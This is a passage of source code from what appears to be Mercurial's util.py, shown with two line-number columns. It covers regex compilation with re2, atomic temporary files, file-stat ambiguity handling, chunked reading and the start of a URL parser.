1923 1925 import re2
1924 1926 _re2 = None
1925 1927 except ImportError:
1926 1928 _re2 = False
1927 1929
1928 1930 class _re(object):
1929 1931 def _checkre2(self):
1930 1932 global _re2
1931 1933 try:
1932 1934 # check if match works, see issue3964
1933 1935 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1934 1936 except ImportError:
1935 1937 _re2 = False
1936 1938
1937 1939 def compile(self, pat, flags=0):
1938 1940 '''Compile a regular expression, using re2 if possible
1939 1941
1940 1942 For best performance, use only re2-compatible regexp features. The
1941 1943 only flags from the re module that are re2-compatible are
1942 1944 IGNORECASE and MULTILINE.'''
1943 1945 if _re2 is None:
1944 1946 self._checkre2()
1945 1947 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1946 1948 if flags & remod.IGNORECASE:
1947 1949 pat = '(?i)' + pat
1948 1950 if flags & remod.MULTILINE:
1949 1951 pat = '(?m)' + pat
1950 1952 try:
1951 1953 return re2.compile(pat)
1952 1954 except re2.error:
1953 1955 pass
1954 1956 return remod.compile(pat, flags)
1955 1957
1956 1958 @propertycache
1957 1959 def escape(self):
1958 1960 '''Return the version of escape corresponding to self.compile.
1959 1961
1960 1962 This is imperfect because whether re2 or re is used for a particular
1961 1963 function depends on the flags, etc, but it's the best we can do.
1962 1964 '''
1963 1965 global _re2
1964 1966 if _re2 is None:
1965 1967 self._checkre2()
1966 1968 if _re2:
1967 1969 return re2.escape
1968 1970 else:
1969 1971 return remod.escape
1970 1972
1971 1973 re = _re()
1972 1974
1973 1975 _fspathcache = {}
1974 1976 def fspath(name, root):
1975 1977 '''Get name in the case stored in the filesystem
1976 1978
1977 1979 The name should be relative to root, and be normcase-ed for efficiency.
1978 1980
1979 1981 Note that this function is unnecessary, and should not be
1980 1982 called, for case-sensitive filesystems (simply because it's expensive).
1981 1983
1982 1984 The root should be normcase-ed, too.
1983 1985 '''
1984 1986 def _makefspathcacheentry(dir):
1985 1987 return dict((normcase(n), n) for n in os.listdir(dir))
1986 1988
1987 1989 seps = pycompat.ossep
1988 1990 if pycompat.osaltsep:
1989 1991 seps = seps + pycompat.osaltsep
1990 1992 # Protect backslashes. This gets silly very quickly.
1991 1993 seps.replace('\\','\\\\')
1992 1994 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1993 1995 dir = os.path.normpath(root)
1994 1996 result = []
1995 1997 for part, sep in pattern.findall(name):
1996 1998 if sep:
1997 1999 result.append(sep)
1998 2000 continue
1999 2001
2000 2002 if dir not in _fspathcache:
2001 2003 _fspathcache[dir] = _makefspathcacheentry(dir)
2002 2004 contents = _fspathcache[dir]
2003 2005
2004 2006 found = contents.get(part)
2005 2007 if not found:
2006 2008 # retry "once per directory" per "dirstate.walk" which
2007 2009 # may take place for each patches of "hg qpush", for example
2008 2010 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
2009 2011 found = contents.get(part)
2010 2012
2011 2013 result.append(found or part)
2012 2014 dir = os.path.join(dir, part)
2013 2015
2014 2016 return ''.join(result)
2015 2017
2016 2018 def checknlink(testfile):
2017 2019 '''check whether hardlink count reporting works properly'''
2018 2020
2019 2021 # testfile may be open, so we need a separate file for checking to
2020 2022 # work around issue2543 (or testfile may get lost on Samba shares)
2021 2023 f1, f2, fp = None, None, None
2022 2024 try:
2023 2025 fd, f1 = pycompat.mkstemp(prefix='.%s-' % os.path.basename(testfile),
2024 2026 suffix='1~', dir=os.path.dirname(testfile))
2025 2027 os.close(fd)
2026 2028 f2 = '%s2~' % f1[:-2]
2027 2029
2028 2030 oslink(f1, f2)
2029 2031 # nlinks() may behave differently for files on Windows shares if
2030 2032 # the file is open.
2031 2033 fp = posixfile(f2)
2032 2034 return nlinks(f2) > 1
2033 2035 except OSError:
2034 2036 return False
2035 2037 finally:
2036 2038 if fp is not None:
2037 2039 fp.close()
2038 2040 for f in (f1, f2):
2039 2041 try:
2040 2042 if f is not None:
2041 2043 os.unlink(f)
2042 2044 except OSError:
2043 2045 pass
2044 2046
2045 2047 def endswithsep(path):
2046 2048 '''Check path ends with os.sep or os.altsep.'''
2047 2049 return (path.endswith(pycompat.ossep)
2048 2050 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
2049 2051
2050 2052 def splitpath(path):
2051 2053 '''Split path by os.sep.
2052 2054 Note that this function does not use os.altsep because this is
2053 2055 an alternative of simple "xxx.split(os.sep)".
2054 2056 It is recommended to use os.path.normpath() before using this
2055 2057 function if need.'''
2056 2058 return path.split(pycompat.ossep)
2057 2059
2058 2060 def mktempcopy(name, emptyok=False, createmode=None, enforcewritable=False):
2059 2061 """Create a temporary file with the same contents from name
2060 2062
2061 2063 The permission bits are copied from the original file.
2062 2064
2063 2065 If the temporary file is going to be truncated immediately, you
2064 2066 can use emptyok=True as an optimization.
2065 2067
2066 2068 Returns the name of the temporary file.
2067 2069 """
2068 2070 d, fn = os.path.split(name)
2069 2071 fd, temp = pycompat.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
2070 2072 os.close(fd)
2071 2073 # Temporary files are created with mode 0600, which is usually not
2072 2074 # what we want. If the original file already exists, just copy
2073 2075 # its mode. Otherwise, manually obey umask.
2074 2076 copymode(name, temp, createmode, enforcewritable)
2075 2077
2076 2078 if emptyok:
2077 2079 return temp
2078 2080 try:
2079 2081 try:
2080 2082 ifp = posixfile(name, "rb")
2081 2083 except IOError as inst:
2082 2084 if inst.errno == errno.ENOENT:
2083 2085 return temp
2084 2086 if not getattr(inst, 'filename', None):
2085 2087 inst.filename = name
2086 2088 raise
2087 2089 ofp = posixfile(temp, "wb")
2088 2090 for chunk in filechunkiter(ifp):
2089 2091 ofp.write(chunk)
2090 2092 ifp.close()
2091 2093 ofp.close()
2092 2094 except: # re-raises
2093 2095 try:
2094 2096 os.unlink(temp)
2095 2097 except OSError:
2096 2098 pass
2097 2099 raise
2098 2100 return temp
2099 2101
2100 2102 class filestat(object):
2101 2103 """help to exactly detect change of a file
2102 2104
2103 2105 'stat' attribute is result of 'os.stat()' if specified 'path'
2104 2106 exists. Otherwise, it is None. This can avoid preparative
2105 2107 'exists()' examination on client side of this class.
2106 2108 """
2107 2109 def __init__(self, stat):
2108 2110 self.stat = stat
2109 2111
2110 2112 @classmethod
2111 2113 def frompath(cls, path):
2112 2114 try:
2113 2115 stat = os.stat(path)
2114 2116 except OSError as err:
2115 2117 if err.errno != errno.ENOENT:
2116 2118 raise
2117 2119 stat = None
2118 2120 return cls(stat)
2119 2121
2120 2122 @classmethod
2121 2123 def fromfp(cls, fp):
2122 2124 stat = os.fstat(fp.fileno())
2123 2125 return cls(stat)
2124 2126
2125 2127 __hash__ = object.__hash__
2126 2128
2127 2129 def __eq__(self, old):
2128 2130 try:
2129 2131 # if ambiguity between stat of new and old file is
2130 2132 # avoided, comparison of size, ctime and mtime is enough
2131 2133 # to exactly detect change of a file regardless of platform
2132 2134 return (self.stat.st_size == old.stat.st_size and
2133 2135 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
2134 2136 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
2135 2137 except AttributeError:
2136 2138 pass
2137 2139 try:
2138 2140 return self.stat is None and old.stat is None
2139 2141 except AttributeError:
2140 2142 return False
2141 2143
2142 2144 def isambig(self, old):
2143 2145 """Examine whether new (= self) stat is ambiguous against old one
2144 2146
2145 2147 "S[N]" below means stat of a file at N-th change:
2146 2148
2147 2149 - S[n-1].ctime < S[n].ctime: can detect change of a file
2148 2150 - S[n-1].ctime == S[n].ctime
2149 2151 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2150 2152 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2151 2153 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2152 2154 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2153 2155
2154 2156 Case (*2) above means that a file was changed twice or more at
2155 2157 same time in sec (= S[n-1].ctime), and comparison of timestamp
2156 2158 is ambiguous.
2157 2159
2158 2160 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2159 2161 timestamp is ambiguous".
2160 2162
2161 2163 But advancing mtime only in case (*2) doesn't work as
2162 2164 expected, because naturally advanced S[n].mtime in case (*1)
2163 2165 might be equal to manually advanced S[n-1 or earlier].mtime.
2164 2166
2165 2167 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2166 2168 treated as ambiguous regardless of mtime, to avoid overlooking
2167 2169 by confliction between such mtime.
2168 2170
2169 2171 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2170 2172 S[n].mtime", even if size of a file isn't changed.
2171 2173 """
2172 2174 try:
2173 2175 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2174 2176 except AttributeError:
2175 2177 return False
2176 2178
2177 2179 def avoidambig(self, path, old):
2178 2180 """Change file stat of specified path to avoid ambiguity
2179 2181
2180 2182 'old' should be previous filestat of 'path'.
2181 2183
2182 2184 This skips avoiding ambiguity, if a process doesn't have
2183 2185 appropriate privileges for 'path'. This returns False in this
2184 2186 case.
2185 2187
2186 2188 Otherwise, this returns True, as "ambiguity is avoided".
2187 2189 """
2188 2190 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2189 2191 try:
2190 2192 os.utime(path, (advanced, advanced))
2191 2193 except OSError as inst:
2192 2194 if inst.errno == errno.EPERM:
2193 2195 # utime() on the file created by another user causes EPERM,
2194 2196 # if a process doesn't have appropriate privileges
2195 2197 return False
2196 2198 raise
2197 2199 return True
2198 2200
2199 2201 def __ne__(self, other):
2200 2202 return not self == other
2201 2203
2202 2204 class atomictempfile(object):
2203 2205 '''writable file object that atomically updates a file
2204 2206
2205 2207 All writes will go to a temporary copy of the original file. Call
2206 2208 close() when you are done writing, and atomictempfile will rename
2207 2209 the temporary copy to the original name, making the changes
2208 2210 visible. If the object is destroyed without being closed, all your
2209 2211 writes are discarded.
2210 2212
2211 2213 checkambig argument of constructor is used with filestat, and is
2212 2214 useful only if target file is guarded by any lock (e.g. repo.lock
2213 2215 or repo.wlock).
2214 2216 '''
2215 2217 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2216 2218 self.__name = name # permanent name
2217 2219 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2218 2220 createmode=createmode,
2219 2221 enforcewritable=('w' in mode))
2220 2222
2221 2223 self._fp = posixfile(self._tempname, mode)
2222 2224 self._checkambig = checkambig
2223 2225
2224 2226 # delegated methods
2225 2227 self.read = self._fp.read
2226 2228 self.write = self._fp.write
2227 2229 self.seek = self._fp.seek
2228 2230 self.tell = self._fp.tell
2229 2231 self.fileno = self._fp.fileno
2230 2232
2231 2233 def close(self):
2232 2234 if not self._fp.closed:
2233 2235 self._fp.close()
2234 2236 filename = localpath(self.__name)
2235 2237 oldstat = self._checkambig and filestat.frompath(filename)
2236 2238 if oldstat and oldstat.stat:
2237 2239 rename(self._tempname, filename)
2238 2240 newstat = filestat.frompath(filename)
2239 2241 if newstat.isambig(oldstat):
2240 2242 # stat of changed file is ambiguous to original one
2241 2243 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2242 2244 os.utime(filename, (advanced, advanced))
2243 2245 else:
2244 2246 rename(self._tempname, filename)
2245 2247
2246 2248 def discard(self):
2247 2249 if not self._fp.closed:
2248 2250 try:
2249 2251 os.unlink(self._tempname)
2250 2252 except OSError:
2251 2253 pass
2252 2254 self._fp.close()
2253 2255
2254 2256 def __del__(self):
2255 2257 if safehasattr(self, '_fp'): # constructor actually did something
2256 2258 self.discard()
2257 2259
2258 2260 def __enter__(self):
2259 2261 return self
2260 2262
2261 2263 def __exit__(self, exctype, excvalue, traceback):
2262 2264 if exctype is not None:
2263 2265 self.discard()
2264 2266 else:
2265 2267 self.close()
2266 2268
2267 2269 def unlinkpath(f, ignoremissing=False, rmdir=True):
2268 2270 """unlink and remove the directory if it is empty"""
2269 2271 if ignoremissing:
2270 2272 tryunlink(f)
2271 2273 else:
2272 2274 unlink(f)
2273 2275 if rmdir:
2274 2276 # try removing directories that might now be empty
2275 2277 try:
2276 2278 removedirs(os.path.dirname(f))
2277 2279 except OSError:
2278 2280 pass
2279 2281
2280 2282 def tryunlink(f):
2281 2283 """Attempt to remove a file, ignoring ENOENT errors."""
2282 2284 try:
2283 2285 unlink(f)
2284 2286 except OSError as e:
2285 2287 if e.errno != errno.ENOENT:
2286 2288 raise
2287 2289
2288 2290 def makedirs(name, mode=None, notindexed=False):
2289 2291 """recursive directory creation with parent mode inheritance
2290 2292
2291 2293 Newly created directories are marked as "not to be indexed by
2292 2294 the content indexing service", if ``notindexed`` is specified
2293 2295 for "write" mode access.
2294 2296 """
2295 2297 try:
2296 2298 makedir(name, notindexed)
2297 2299 except OSError as err:
2298 2300 if err.errno == errno.EEXIST:
2299 2301 return
2300 2302 if err.errno != errno.ENOENT or not name:
2301 2303 raise
2302 2304 parent = os.path.dirname(os.path.abspath(name))
2303 2305 if parent == name:
2304 2306 raise
2305 2307 makedirs(parent, mode, notindexed)
2306 2308 try:
2307 2309 makedir(name, notindexed)
2308 2310 except OSError as err:
2309 2311 # Catch EEXIST to handle races
2310 2312 if err.errno == errno.EEXIST:
2311 2313 return
2312 2314 raise
2313 2315 if mode is not None:
2314 2316 os.chmod(name, mode)
2315 2317
2316 2318 def readfile(path):
2317 2319 with open(path, 'rb') as fp:
2318 2320 return fp.read()
2319 2321
2320 2322 def writefile(path, text):
2321 2323 with open(path, 'wb') as fp:
2322 2324 fp.write(text)
2323 2325
2324 2326 def appendfile(path, text):
2325 2327 with open(path, 'ab') as fp:
2326 2328 fp.write(text)
2327 2329
2328 2330 class chunkbuffer(object):
2329 2331 """Allow arbitrary sized chunks of data to be efficiently read from an
2330 2332 iterator over chunks of arbitrary size."""
2331 2333
2332 2334 def __init__(self, in_iter):
2333 2335 """in_iter is the iterator that's iterating over the input chunks."""
2334 2336 def splitbig(chunks):
2335 2337 for chunk in chunks:
2336 2338 if len(chunk) > 2**20:
2337 2339 pos = 0
2338 2340 while pos < len(chunk):
2339 2341 end = pos + 2 ** 18
2340 2342 yield chunk[pos:end]
2341 2343 pos = end
2342 2344 else:
2343 2345 yield chunk
2344 2346 self.iter = splitbig(in_iter)
2345 2347 self._queue = collections.deque()
2346 2348 self._chunkoffset = 0
2347 2349
2348 2350 def read(self, l=None):
2349 2351 """Read L bytes of data from the iterator of chunks of data.
2350 2352 Returns less than L bytes if the iterator runs dry.
2351 2353
2352 2354 If size parameter is omitted, read everything"""
2353 2355 if l is None:
2354 2356 return ''.join(self.iter)
2355 2357
2356 2358 left = l
2357 2359 buf = []
2358 2360 queue = self._queue
2359 2361 while left > 0:
2360 2362 # refill the queue
2361 2363 if not queue:
2362 2364 target = 2**18
2363 2365 for chunk in self.iter:
2364 2366 queue.append(chunk)
2365 2367 target -= len(chunk)
2366 2368 if target <= 0:
2367 2369 break
2368 2370 if not queue:
2369 2371 break
2370 2372
2371 2373 # The easy way to do this would be to queue.popleft(), modify the
2372 2374 # chunk (if necessary), then queue.appendleft(). However, for cases
2373 2375 # where we read partial chunk content, this incurs 2 dequeue
2374 2376 # mutations and creates a new str for the remaining chunk in the
2375 2377 # queue. Our code below avoids this overhead.
2376 2378
2377 2379 chunk = queue[0]
2378 2380 chunkl = len(chunk)
2379 2381 offset = self._chunkoffset
2380 2382
2381 2383 # Use full chunk.
2382 2384 if offset == 0 and left >= chunkl:
2383 2385 left -= chunkl
2384 2386 queue.popleft()
2385 2387 buf.append(chunk)
2386 2388 # self._chunkoffset remains at 0.
2387 2389 continue
2388 2390
2389 2391 chunkremaining = chunkl - offset
2390 2392
2391 2393 # Use all of unconsumed part of chunk.
2392 2394 if left >= chunkremaining:
2393 2395 left -= chunkremaining
2394 2396 queue.popleft()
2395 2397 # offset == 0 is enabled by block above, so this won't merely
2396 2398 # copy via ``chunk[0:]``.
2397 2399 buf.append(chunk[offset:])
2398 2400 self._chunkoffset = 0
2399 2401
2400 2402 # Partial chunk needed.
2401 2403 else:
2402 2404 buf.append(chunk[offset:offset + left])
2403 2405 self._chunkoffset += left
2404 2406 left -= chunkremaining
2405 2407
2406 2408 return ''.join(buf)
2407 2409
2408 2410 def filechunkiter(f, size=131072, limit=None):
2409 2411 """Create a generator that produces the data in the file size
2410 2412 (default 131072) bytes at a time, up to optional limit (default is
2411 2413 to read all data). Chunks may be less than size bytes if the
2412 2414 chunk is the last chunk in the file, or the file is a socket or
2413 2415 some other type of file that sometimes reads less data than is
2414 2416 requested."""
2415 2417 assert size >= 0
2416 2418 assert limit is None or limit >= 0
2417 2419 while True:
2418 2420 if limit is None:
2419 2421 nbytes = size
2420 2422 else:
2421 2423 nbytes = min(limit, size)
2422 2424 s = nbytes and f.read(nbytes)
2423 2425 if not s:
2424 2426 break
2425 2427 if limit:
2426 2428 limit -= len(s)
2427 2429 yield s
2428 2430
2429 2431 class cappedreader(object):
2430 2432 """A file object proxy that allows reading up to N bytes.
2431 2433
2432 2434 Given a source file object, instances of this type allow reading up to
2433 2435 N bytes from that source file object. Attempts to read past the allowed
2434 2436 limit are treated as EOF.
2435 2437
2436 2438 It is assumed that I/O is not performed on the original file object
2437 2439 in addition to I/O that is performed by this instance. If there is,
2438 2440 state tracking will get out of sync and unexpected results will ensue.
2439 2441 """
2440 2442 def __init__(self, fh, limit):
2441 2443 """Allow reading up to <limit> bytes from <fh>."""
2442 2444 self._fh = fh
2443 2445 self._left = limit
2444 2446
2445 2447 def read(self, n=-1):
2446 2448 if not self._left:
2447 2449 return b''
2448 2450
2449 2451 if n < 0:
2450 2452 n = self._left
2451 2453
2452 2454 data = self._fh.read(min(n, self._left))
2453 2455 self._left -= len(data)
2454 2456 assert self._left >= 0
2455 2457
2456 2458 return data
2457 2459
2458 2460 def readinto(self, b):
2459 2461 res = self.read(len(b))
2460 2462 if res is None:
2461 2463 return None
2462 2464
2463 2465 b[0:len(res)] = res
2464 2466 return len(res)
2465 2467
2466 2468 def unitcountfn(*unittable):
2467 2469 '''return a function that renders a readable count of some quantity'''
2468 2470
2469 2471 def go(count):
2470 2472 for multiplier, divisor, format in unittable:
2471 2473 if abs(count) >= divisor * multiplier:
2472 2474 return format % (count / float(divisor))
2473 2475 return unittable[-1][2] % count
2474 2476
2475 2477 return go
2476 2478
2477 2479 def processlinerange(fromline, toline):
2478 2480 """Check that linerange <fromline>:<toline> makes sense and return a
2479 2481 0-based range.
2480 2482
2481 2483 >>> processlinerange(10, 20)
2482 2484 (9, 20)
2483 2485 >>> processlinerange(2, 1)
2484 2486 Traceback (most recent call last):
2485 2487 ...
2486 2488 ParseError: line range must be positive
2487 2489 >>> processlinerange(0, 5)
2488 2490 Traceback (most recent call last):
2489 2491 ...
2490 2492 ParseError: fromline must be strictly positive
2491 2493 """
2492 2494 if toline - fromline < 0:
2493 2495 raise error.ParseError(_("line range must be positive"))
2494 2496 if fromline < 1:
2495 2497 raise error.ParseError(_("fromline must be strictly positive"))
2496 2498 return fromline - 1, toline
2497 2499
2498 2500 bytecount = unitcountfn(
2499 2501 (100, 1 << 30, _('%.0f GB')),
2500 2502 (10, 1 << 30, _('%.1f GB')),
2501 2503 (1, 1 << 30, _('%.2f GB')),
2502 2504 (100, 1 << 20, _('%.0f MB')),
2503 2505 (10, 1 << 20, _('%.1f MB')),
2504 2506 (1, 1 << 20, _('%.2f MB')),
2505 2507 (100, 1 << 10, _('%.0f KB')),
2506 2508 (10, 1 << 10, _('%.1f KB')),
2507 2509 (1, 1 << 10, _('%.2f KB')),
2508 2510 (1, 1, _('%.0f bytes')),
2509 2511 )
2510 2512
2511 2513 class transformingwriter(object):
2512 2514 """Writable file wrapper to transform data by function"""
2513 2515
2514 2516 def __init__(self, fp, encode):
2515 2517 self._fp = fp
2516 2518 self._encode = encode
2517 2519
2518 2520 def close(self):
2519 2521 self._fp.close()
2520 2522
2521 2523 def flush(self):
2522 2524 self._fp.flush()
2523 2525
2524 2526 def write(self, data):
2525 2527 return self._fp.write(self._encode(data))
2526 2528
2527 2529 # Matches a single EOL which can either be a CRLF where repeated CR
2528 2530 # are removed or a LF. We do not care about old Macintosh files, so a
2529 2531 # stray CR is an error.
2530 2532 _eolre = remod.compile(br'\r*\n')
2531 2533
2532 2534 def tolf(s):
2533 2535 return _eolre.sub('\n', s)
2534 2536
2535 2537 def tocrlf(s):
2536 2538 return _eolre.sub('\r\n', s)
2537 2539
2538 2540 def _crlfwriter(fp):
2539 2541 return transformingwriter(fp, tocrlf)
2540 2542
2541 2543 if pycompat.oslinesep == '\r\n':
2542 2544 tonativeeol = tocrlf
2543 2545 fromnativeeol = tolf
2544 2546 nativeeolwriter = _crlfwriter
2545 2547 else:
2546 2548 tonativeeol = pycompat.identity
2547 2549 fromnativeeol = pycompat.identity
2548 2550 nativeeolwriter = pycompat.identity
2549 2551
2550 2552 if (pyplatform.python_implementation() == 'CPython' and
2551 2553 sys.version_info < (3, 0)):
2552 2554 # There is an issue in CPython that some IO methods do not handle EINTR
2553 2555 # correctly. The following table shows what CPython version (and functions)
2554 2556 # are affected (buggy: has the EINTR bug, okay: otherwise):
2555 2557 #
2556 2558 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2557 2559 # --------------------------------------------------
2558 2560 # fp.__iter__ | buggy | buggy | okay
2559 2561 # fp.read* | buggy | okay [1] | okay
2560 2562 #
2561 2563 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2562 2564 #
2563 2565 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2564 2566 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2565 2567 #
2566 2568 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2567 2569 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2568 2570 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2569 2571 # fp.__iter__ but not other fp.read* methods.
2570 2572 #
2571 2573 # On modern systems like Linux, the "read" syscall cannot be interrupted
2572 2574 # when reading "fast" files like on-disk files. So the EINTR issue only
2573 2575 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2574 2576 # files approximately as "fast" files and use the fast (unsafe) code path,
2575 2577 # to minimize the performance impact.
2576 2578 if sys.version_info >= (2, 7, 4):
2577 2579 # fp.readline deals with EINTR correctly, use it as a workaround.
2578 2580 def _safeiterfile(fp):
2579 2581 return iter(fp.readline, '')
2580 2582 else:
2581 2583 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2582 2584 # note: this may block longer than necessary because of bufsize.
2583 2585 def _safeiterfile(fp, bufsize=4096):
2584 2586 fd = fp.fileno()
2585 2587 line = ''
2586 2588 while True:
2587 2589 try:
2588 2590 buf = os.read(fd, bufsize)
2589 2591 except OSError as ex:
2590 2592 # os.read only raises EINTR before any data is read
2591 2593 if ex.errno == errno.EINTR:
2592 2594 continue
2593 2595 else:
2594 2596 raise
2595 2597 line += buf
2596 2598 if '\n' in buf:
2597 2599 splitted = line.splitlines(True)
2598 2600 line = ''
2599 2601 for l in splitted:
2600 2602 if l[-1] == '\n':
2601 2603 yield l
2602 2604 else:
2603 2605 line = l
2604 2606 if not buf:
2605 2607 break
2606 2608 if line:
2607 2609 yield line
2608 2610
2609 2611 def iterfile(fp):
2610 2612 fastpath = True
2611 2613 if type(fp) is file:
2612 2614 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2613 2615 if fastpath:
2614 2616 return fp
2615 2617 else:
2616 2618 return _safeiterfile(fp)
2617 2619 else:
2618 2620 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2619 2621 def iterfile(fp):
2620 2622 return fp
2621 2623
2622 2624 def iterlines(iterator):
2623 2625 for chunk in iterator:
2624 2626 for line in chunk.splitlines():
2625 2627 yield line
2626 2628
2627 2629 def expandpath(path):
2628 2630 return os.path.expanduser(os.path.expandvars(path))
2629 2631
2630 2632 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2631 2633 """Return the result of interpolating items in the mapping into string s.
2632 2634
2633 2635 prefix is a single character string, or a two character string with
2634 2636 a backslash as the first character if the prefix needs to be escaped in
2635 2637 a regular expression.
2636 2638
2637 2639 fn is an optional function that will be applied to the replacement text
2638 2640 just before replacement.
2639 2641
2640 2642 escape_prefix is an optional flag that allows using doubled prefix for
2641 2643 its escaping.
2642 2644 """
2643 2645 fn = fn or (lambda s: s)
2644 2646 patterns = '|'.join(mapping.keys())
2645 2647 if escape_prefix:
2646 2648 patterns += '|' + prefix
2647 2649 if len(prefix) > 1:
2648 2650 prefix_char = prefix[1:]
2649 2651 else:
2650 2652 prefix_char = prefix
2651 2653 mapping[prefix_char] = prefix_char
2652 2654 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2653 2655 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2654 2656
2655 2657 def getport(port):
2656 2658 """Return the port for a given network service.
2657 2659
2658 2660 If port is an integer, it's returned as is. If it's a string, it's
2659 2661 looked up using socket.getservbyname(). If there's no matching
2660 2662 service, error.Abort is raised.
2661 2663 """
2662 2664 try:
2663 2665 return int(port)
2664 2666 except ValueError:
2665 2667 pass
2666 2668
2667 2669 try:
2668 2670 return socket.getservbyname(pycompat.sysstr(port))
2669 2671 except socket.error:
2670 2672 raise error.Abort(_("no port number associated with service '%s'")
2671 2673 % port)
2672 2674
2673 2675 class url(object):
2674 2676 r"""Reliable URL parser.
2675 2677
2676 2678 This parses URLs and provides attributes for the following
2677 2679 components:
2678 2680
2679 2681 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2680 2682
2681 2683 Missing components are set to None. The only exception is
2682 2684 fragment, which is set to '' if present but empty.
2683 2685
2684 2686 If parsefragment is False, fragment is included in query. If
2685 2687 parsequery is False, query is included in path. If both are
2686 2688 False, both fragment and query are included in path.
2687 2689
2688 2690 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2689 2691
2690 2692 Note that for backward compatibility reasons, bundle URLs do not
2691 2693 take host names. That means 'bundle://../' has a path of '../'.
2692 2694
2693 2695 Examples:
2694 2696
2695 2697 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2696 2698 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2697 2699 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2698 2700 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2699 2701 >>> url(b'file:///home/joe/repo')
2700 2702 <url scheme: 'file', path: '/home/joe/repo'>
2701 2703 >>> url(b'file:///c:/temp/foo/')
2702 2704 <url scheme: 'file', path: 'c:/temp/foo/'>
2703 2705 >>> url(b'bundle:foo')
2704 2706 <url scheme: 'bundle', path: 'foo'>
2705 2707 >>> url(b'bundle://../foo')
2706 2708 <url scheme: 'bundle', path: '../foo'>
2707 2709 >>> url(br'c:\foo\bar')
2708 2710 <url path: 'c:\\foo\\bar'>
2709 2711 >>> url(br'\\blah\blah\blah')
2710 2712 <url path: '\\\\blah\\blah\\blah'>
2711 2713 >>> url(br'\\blah\blah\blah#baz')
2712 2714 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2713 2715 >>> url(br'file:///C:\users\me')
2714 2716 <url scheme: 'file', path: 'C:\\users\\me'>
2715 2717
2716 2718 Authentication credentials:
2717 2719
2718 2720 >>> url(b'ssh://joe:xyz@x/repo')
2719 2721 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2720 2722 >>> url(b'ssh://joe@x/repo')
2721 2723 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2722 2724
2723 2725 Query strings and fragments:
2724 2726
2725 2727 >>> url(b'http://host/a?b#c')
2726 2728 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2727 2729 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2728 2730 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2729 2731
2730 2732 Empty path:
2731 2733
2732 2734 >>> url(b'')
2733 2735 <url path: ''>
2734 2736 >>> url(b'#a')
2735 2737 <url path: '', fragment: 'a'>
2736 2738 >>> url(b'http://host/')
2737 2739 <url scheme: 'http', host: 'host', path: ''>
2738 2740 >>> url(b'http://host/#a')
2739 2741 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2740 2742
2741 2743 Only scheme:
2742 2744
2743 2745 >>> url(b'http:')
2744 2746 <url scheme: 'http'>
2745 2747 """
2746 2748
2747 2749 _safechars = "!~*'()+"
2748 2750 _safepchars = "/!~*'()+:\\"
2749 2751 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2750 2752
2751 2753 def __init__(self, path, parsequery=True, parsefragment=True):
2752 2754 # We slowly chomp away at path until we have only the path left
2753 2755 self.scheme = self.user = self.passwd = self.host = None
2754 2756 self.port = self.path = self.query = self.fragment = None
2755 2757 self._localpath = True
2756 2758 self._hostport = ''
2757 2759 self._origpath = path
2758 2760
2759 2761 if parsefragment and '#' in path:
2760 2762 path, self.fragment = path.split('#', 1)
2761 2763
2762 2764 # special case for Windows drive letters and UNC paths
2763 2765 if hasdriveletter(path) or path.startswith('\\\\'):
2764 2766 self.path = path
2765 2767 return
2766 2768
2767 2769 # For compatibility reasons, we can't handle bundle paths as
2768 2770 # normal URLS
2769 2771 if path.startswith('bundle:'):
2770 2772 self.scheme = 'bundle'
2771 2773 path = path[7:]
2772 2774 if path.startswith('//'):
2773 2775 path = path[2:]
2774 2776 self.path = path
2775 2777 return
2776 2778
2777 2779 if self._matchscheme(path):
2778 2780 parts = path.split(':', 1)
2779 2781 if parts[0]:
2780 2782 self.scheme, path = parts
2781 2783 self._localpath = False
2782 2784
